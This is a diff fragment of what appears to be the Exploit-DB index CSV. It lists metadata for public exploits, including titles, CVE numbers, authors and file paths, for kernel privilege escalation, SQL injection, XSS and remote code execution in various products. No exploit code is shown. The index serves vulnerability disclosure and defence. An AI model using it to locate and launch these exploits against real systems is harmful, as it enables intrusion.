39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info 39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info
51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,, 51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,,
51382,exploits/hardware/remote/51382.txt,"Franklin Fueling Systems TS-550 - Default Password",2023-04-20,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-20,2023-04-20,0,,,,,,
49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,, 49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,,
32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,, 32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,,
4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,, 4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,,
@ -5605,6 +5606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43849,exploits/json/webapps/43849.txt,"Shopware 5.2.5/5.3 - Cross-Site Scripting",2018-01-21,Vulnerability-Lab,webapps,json,,2018-01-21,2018-01-21,0,CVE-2017-15374,,,,, 43849,exploits/json/webapps/43849.txt,"Shopware 5.2.5/5.3 - Cross-Site Scripting",2018-01-21,Vulnerability-Lab,webapps,json,,2018-01-21,2018-01-21,0,CVE-2017-15374,,,,,
42332,exploits/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,webapps,json,,2017-07-18,2017-07-18,1,CVE-2017-6182,,,,, 42332,exploits/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,webapps,json,,2017-07-18,2017-07-18,1,CVE-2017-6182,,,,,
42111,exploits/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",webapps,json,,2017-06-02,2017-08-18,0,CVE-2016-6566,,,,, 42111,exploits/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",webapps,json,,2017-06-02,2017-08-18,0,CVE-2016-6566,,,,,
51379,exploits/json/webapps/51379.txt,"Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information",2023-04-20,"Rafael Cintra Lopes",webapps,json,,2023-04-20,2023-04-20,0,,,,,,
39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",webapps,json,8443,2016-02-23,2016-02-23,0,,,,,, 39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",webapps,json,8443,2016-02-23,2016-02-23,0,,,,,,
40030,exploits/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection",2016-06-28,"Matt Bush",webapps,json,80,2016-06-28,2016-06-28,0,,,,,, 40030,exploits/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection",2016-06-28,"Matt Bush",webapps,json,80,2016-06-28,2016-06-28,0,,,,,,
48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,,2020-02-05,2020-02-05,0,CVE-2019-10716,,,,, 48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,,2020-02-05,2020-02-05,0,CVE-2019-10716,,,,,
@ -7293,6 +7295,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux,,2017-05-11,2019-07-26,1,CVE-2017-7308,Local,,,,https://github.com/xairy/kernel-exploits/blob/44fcbaafcb2988d3cbfee5d417b17368e15c78bf/CVE-2017-7308/poc.c 41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux,,2017-05-11,2019-07-26,1,CVE-2017-7308,Local,,,,https://github.com/xairy/kernel-exploits/blob/44fcbaafcb2988d3cbfee5d417b17368e15c78bf/CVE-2017-7308/poc.c
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",2021-11-23,"Ujas Dhami",local,linux,,2021-11-23,2021-11-23,0,CVE-2019-13272,,,,, 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",2021-11-23,"Ujas Dhami",local,linux,,2021-11-23,2021-11-23,0,CVE-2019-13272,,,,,
50808,exploits/linux/local/50808.c,"Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)",2022-03-08,"Lance Biggerstaff",local,linux,,2022-03-08,2022-03-08,0,CVE-2022-0847,,,,, 50808,exploits/linux/local/50808.c,"Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)",2022-03-08,"Lance Biggerstaff",local,linux,,2022-03-08,2022-03-08,0,CVE-2022-0847,,,,,
51384,exploits/linux/local/51384.txt,"Linux Kernel 6.2 - Userspace Processes To Enable Mitigation",2023-04-20,nu11secur1ty,local,linux,,2023-04-20,2023-04-20,0,CVE-2023-1998,,,,,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,,2003-04-13,2016-02-25,1,OSVDB-4565;CVE-2003-0127,,,,http://www.exploit-db.comlinux-2.4.19.tar.gz, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,,2003-04-13,2016-02-25,1,OSVDB-4565;CVE-2003-0127,,,,http://www.exploit-db.comlinux-2.4.19.tar.gz,
4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux,,2007-12-17,2016-11-08,1,,,,,http://www.exploit-db.comlinux-2.6.11.1.tar.gz, 4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux,,2007-12-17,2016-11-08,1,,,,,http://www.exploit-db.comlinux-2.6.11.1.tar.gz,
9363,exploits/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",local,linux,,2009-08-04,,1,CVE-2005-4605;OSVDB-22212,,,,, 9363,exploits/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",local,linux,,2009-08-04,,1,CVE-2005-4605;OSVDB-22212,,,,,
@ -10993,6 +10996,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info 19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info
24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info 24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info
19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,,
20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info 20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info
12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple,,2010-04-07,,1,OSVDB-63877;OSVDB-63876;OSVDB-63875;OSVDB-63874,,,,http://www.exploit-db.comWebServer-171.zip, 12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple,,2010-04-07,,1,OSVDB-63877;OSVDB-63876;OSVDB-63875;OSVDB-63874,,,,http://www.exploit-db.comWebServer-171.zip,
36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple,,2015-04-27,2018-11-15,0,CVE-2013-0230;OSVDB-89624,,,,http://www.exploit-db.comminiupnpd-1.0.tar.gz, 36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple,,2015-04-27,2018-11-15,0,CVE-2013-0230;OSVDB-89624,,,,http://www.exploit-db.comminiupnpd-1.0.tar.gz,
@ -14431,6 +14435,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info 28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info
28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info 28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info
28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info 28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info
51378,exploits/php/webapps/51378.txt,"Bang Resto v1.0 - 'Multiple' SQL Injection",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-29849,,,,,
51377,exploits/php/webapps/51377.txt,"Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-29848,,,,,
51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,, 51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip, 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip,
17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,, 17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,,
@ -15467,6 +15473,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info 33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info
15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip, 15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip,
7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,, 7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,,
51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-04-20,0,,,,,,
31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info 31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info
31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info 31391,exploits/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - 'search' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57650,,,,,https://www.securityfocus.com/bid/28219/info
31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info 31389,exploits/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Cross-Site Scripting Vulnerabilities",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57648,,,,,https://www.securityfocus.com/bid/28219/info
@ -18855,6 +18862,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
1595,exploits/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,webapps,php,,2006-03-19,,1,OSVDB-24018;CVE-2006-1348;OSVDB-24017;CVE-2006-1347;OSVDB-24016;CVE-2006-1346,,,,, 1595,exploits/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,webapps,php,,2006-03-19,,1,OSVDB-24018;CVE-2006-1348;OSVDB-24017;CVE-2006-1347;OSVDB-24016;CVE-2006-1346,,,,,
3988,exploits/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,webapps,php,,2007-05-24,,1,OSVDB-36317;CVE-2007-2971,,,,, 3988,exploits/php/webapps/3988.php,"gCards 1.46 - SQL Injection / Remote Code Execution",2007-05-25,Silentz,webapps,php,,2007-05-24,,1,OSVDB-36317;CVE-2007-2971,,,,,
11316,exploits/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,webapps,php,,2010-02-01,,1,,,,,, 11316,exploits/php/webapps/11316.txt,"GCP 2.0 datasets provided as BioCASE Web services - Local File Inclusion",2010-02-02,R3VAN_BASTARD,webapps,php,,2010-02-01,,1,,,,,,
51381,exploits/php/webapps/51381.txt,"GDidees CMS 3.9.1 - Local File Disclosure",2023-04-20,"Hadi Mene",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-27179,,,,,
31961,exploits/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,webapps,php,80,2014-02-27,2014-02-27,0,OSVDB-104011;OSVDB-104010;OSVDB-104009;OSVDB-104008;OSVDB-104007;CVE-2014-100031;CVE-2014-100030;CVE-2014-100029,,,,http://www.exploit-db.comgdl42.zip, 31961,exploits/php/webapps/31961.txt,"GDL 4.2 - Multiple Vulnerabilities",2014-02-27,ByEge,webapps,php,80,2014-02-27,2014-02-27,0,OSVDB-104011;OSVDB-104010;OSVDB-104009;OSVDB-104008;OSVDB-104007;CVE-2014-100031;CVE-2014-100030;CVE-2014-100029,,,,http://www.exploit-db.comgdl42.zip,
8228,exploits/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,webapps,php,,2009-03-16,,1,OSVDB-52803;CVE-2009-0965,,,,, 8228,exploits/php/webapps/8228.txt,"GDL 4.x - 'node' SQL Injection",2009-03-17,g4t3w4y,webapps,php,,2009-03-16,,1,OSVDB-52803;CVE-2009-0965,,,,,
3522,exploits/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,webapps,php,,2007-03-19,2016-09-27,1,OSVDB-33776;CVE-2007-1577,,,,http://www.exploit-db.comgeblog-0.1.tar.gz, 3522,exploits/php/webapps/3522.pl,"GeBlog 0.1 (Windows) - GLOBALS[tplname] Local File Inclusion",2007-03-20,GoLd_M,webapps,php,,2007-03-19,2016-09-27,1,OSVDB-33776;CVE-2007-1577,,,,http://www.exploit-db.comgeblog-0.1.tar.gz,
@ -22297,6 +22305,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
3275,exploits/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,webapps,php,,2007-02-05,,1,OSVDB-34599;CVE-2007-0824,,,,, 3275,exploits/php/webapps/3275.txt,"LightRO CMS 1.0 - 'inhalt.php' Remote File Inclusion",2007-02-06,ajann,webapps,php,,2007-02-05,,1,OSVDB-34599;CVE-2007-0824,,,,,
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,,2021-06-25,2021-06-25,1,,,,,http://www.exploit-db.comblog-1.3.zip, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",2021-06-25,"Maide Ilkay Aydogdu",webapps,php,,2021-06-25,2021-06-25,1,,,,,http://www.exploit-db.comblog-1.3.zip,
5873,exploits/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,webapps,php,,2008-06-19,2016-12-08,1,OSVDB-57817;CVE-2008-7172;OSVDB-57816;CVE-2008-7171;OSVDB-57815;OSVDB-57814,,,,, 5873,exploits/php/webapps/5873.txt,"Lightweight news portal (LNP) 1.0b - Multiple Vulnerabilities",2008-06-20,storm,webapps,php,,2008-06-19,2016-12-08,1,OSVDB-57817;CVE-2008-7172;OSVDB-57816;CVE-2008-7171;OSVDB-57815;OSVDB-57814,,,,,
51374,exploits/php/webapps/51374.py,"Lilac-Reloaded for Nagios 2.0.8 - Remote Code Execution (RCE)",2023-04-20,"max / Zoltan Padanyi",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
14443,exploits/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,webapps,php,,2010-07-23,2010-07-23,0,,,,,, 14443,exploits/php/webapps/14443.txt,"LILDBI - Arbitrary File Upload",2010-07-23,EraGoN,webapps,php,,2010-07-23,2010-07-23,0,,,,,,
1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php,,2005-12-13,2017-11-22,1,OSVDB-21753;CVE-2005-4318,,,,, 1373,exploits/php/webapps/1373.php,"Limbo 1.0.4.2 - '_SERVER[REMOTE_ADDR]' Remote Command Execution",2005-12-14,rgod,webapps,php,,2005-12-13,2017-11-22,1,OSVDB-21753;CVE-2005-4318,,,,,
6796,exploits/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,webapps,php,,2008-10-20,,1,OSVDB-51863;CVE-2008-6078,,,,, 6796,exploits/php/webapps/6796.txt,"Limbo CMS - Private Messaging Component SQL Injection",2008-10-21,StAkeR,webapps,php,,2008-10-20,,1,OSVDB-51863;CVE-2008-6078,,,,,
@ -27481,6 +27490,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37146,exploits/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php,,2012-05-09,2015-05-29,1,CVE-2012-2274;OSVDB-81747,,,,,https://www.securityfocus.com/bid/53434/info 37146,exploits/php/webapps/37146.txt,"PivotX 2.3.2 - 'ajaxhelper.php' Cross-Site Scripting",2012-05-09,"High-Tech Bridge SA",webapps,php,,2012-05-09,2015-05-29,1,CVE-2012-2274;OSVDB-81747,,,,,https://www.securityfocus.com/bid/53434/info
38881,exploits/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,webapps,php,,2013-12-17,2015-12-06,1,OSVDB-101409,,,,,https://www.securityfocus.com/bid/64357/info 38881,exploits/php/webapps/38881.html,"Piwigo - 'admin.php' Cross-Site Request Forgery (User Creation)",2013-12-17,sajith,webapps,php,,2013-12-17,2015-12-06,1,OSVDB-101409,,,,,https://www.securityfocus.com/bid/64357/info
49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,,2021-05-03,2021-05-03,0,CVE-2021-27973,,,,http://www.exploit-db.comPiwigo-11.3.0.zip, 49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,,2021-05-03,2021-05-03,0,CVE-2021-27973,,,,http://www.exploit-db.comPiwigo-11.3.0.zip,
51386,exploits/php/webapps/51386.txt,"Piwigo 13.6.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Mirabbas Ağalarov",webapps,php,,2023-04-20,2023-04-20,0,,,,,,
34367,exploits/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",webapps,php,,2009-10-28,2014-08-19,1,CVE-2009-4039;OSVDB-59955,,,,,https://www.securityfocus.com/bid/41897/info 34367,exploits/php/webapps/34367.txt,"Piwigo 2.0 - 'comments.php' Multiple Cross-Site Scripting Vulnerabilities",2009-10-28,"Andrew Paterson",webapps,php,,2009-10-28,2014-08-19,1,CVE-2009-4039;OSVDB-59955,,,,,https://www.securityfocus.com/bid/41897/info
10417,exploits/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,webapps,php,,2009-12-12,,1,OSVDB-60977,,,,http://www.exploit-db.compiwigo-2.0.6.zip, 10417,exploits/php/webapps/10417.txt,"Piwigo 2.0.6 - Multiple Vulnerabilities",2009-12-13,mr_me,webapps,php,,2009-12-12,,1,OSVDB-60977,,,,http://www.exploit-db.compiwigo-2.0.6.zip,
48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php,,2020-09-16,2020-09-16,0,CVE-2020-9467,,,,, 48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php,,2020-09-16,2020-09-16,0,CVE-2020-9467,,,,,
@ -28028,6 +28038,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41433,exploits/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,webapps,php,,2017-02-22,2017-02-22,0,,,,,http://www.exploit-db.comProjectSend-r754.zip,https://www.vulnerability-lab.com/get_content.php?id=2031 41433,exploits/php/webapps/41433.txt,"ProjectSend r754 - Insecure Direct Object Reference",2017-02-21,Vulnerability-Lab,webapps,php,,2017-02-22,2017-02-22,0,,,,,http://www.exploit-db.comProjectSend-r754.zip,https://www.vulnerability-lab.com/get_content.php?id=2031
15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php,,2010-12-18,2010-12-18,1,OSVDB-75934;CVE-2010-4845;OSVDB-69953,,,,, 15773,exploits/php/webapps/15773.txt,"Projekt Shop - 'details.php' Multiple SQL Injections",2010-12-18,"DeadLy DeMon",webapps,php,,2010-12-18,2010-12-18,1,OSVDB-75934;CVE-2010-4845;OSVDB-69953,,,,,
